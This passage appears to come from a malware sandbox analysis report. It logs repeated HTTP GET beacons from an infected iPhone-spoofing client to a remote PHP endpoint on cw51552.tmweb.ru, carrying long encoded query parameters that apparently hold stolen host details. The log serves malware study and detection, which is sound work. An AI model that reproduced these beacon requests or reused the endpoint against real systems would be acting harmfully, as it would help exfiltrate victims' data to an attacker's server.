JXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
